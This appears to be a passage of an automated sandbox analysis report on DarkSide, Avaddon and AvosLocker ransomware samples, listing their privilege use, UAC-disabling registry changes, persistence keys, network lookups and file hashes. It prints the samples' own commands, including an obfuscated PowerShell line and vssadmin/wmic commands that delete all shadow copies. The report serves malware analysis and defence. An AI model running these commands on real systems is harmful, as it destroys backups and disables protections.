Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp

Files

memory/2684-5-0x000007FEF665E000-0x000007FEF665F000-memory.dmp

memory/2684-6-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2684-7-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2684-8-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-9-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-10-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-11-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-12-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

memory/2684-13-0x000007FEF63A0000-0x000007FEF6D3D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 febf5feaf0f1361b17ccb6b16e2ffa52
SHA1 a78bf2f756b27e0434d204ad58e1eb51ad1e6998
SHA256 bc0cdc708a1678f40a3ba3334aaeafdcb4b0465a760b83fb39e06eba415c7c83
SHA512 822271f8f733e6ebbe224b45ce590e5b1e1ffd331825b2c986c23adf7d4a8e387473463f2b9722f9ab4c9064a78f513d1648d0f5ada7c1cbf0199ca41924d493

C:\Users\Admin\README.a8e86c8e.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1799s

Max time network

1445s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (257) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-2660163958-4080398480-1122754539-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\bckgrd.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\bckgrd.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 95.101.129.43:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.26.45.61:80 x2.c.lencr.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabEC16.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarECE3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0005f8884a49a763ee00da5e7a16f5db
SHA1 6293b3f20f11ae57677cc856217b02e1585e9f7b
SHA256 bcabd2f23f21dcef112d089b684f405ae75d432908b6916d34745802cce6629e
SHA512 fa8be5bc941da4f3f9e96abe0fb87da71f0e174bd03ba446c03ef403d122a823a8fb48f780df6399f3c08519ba415b1bdbd2ac9ec98ab26cf432d9ba9b7dc1be

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\451311-readme.html

MD5 75b9edf1bf9b43866e75b3311efca520
SHA1 bf557bb3a19175cfcd75e3bf376697dd88f64afd
SHA256 af371ec997b4777fc9f1cabfb3fabb2b94b9c7682d0934fc542686c15b070c22
SHA512 e5df3a7c46dfe17ba613697c1f9247e56767703873f42fa0fb6d11bf660d78c13183c2a03149e6fa42d86f38298b6f3be9ab3e29c31eea42210085db2f50eada

C:\Users\Admin\Documents\RestorePop.xlsx

MD5 8fb256cf5b864425c54c63bf966e6224
SHA1 3082083ac78ddacd81ad84725d64d0b3ab573f35
SHA256 b42d82a0d734d9bb09ee8aca3dc345e7fd7746b2de24a0fd7c57a1b0d90bda68
SHA512 ea40097f6ad7d0bf17435cdb9b1088114a2dcf4f450b3bc4090916a7aabbf93c0b0130018d9de4d20800f2fb428303dd85053e6de63c3e2ec7c4f5370e84ce1f

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1757s

Max time network

1160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (66) files with added filename extension

ransomware

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
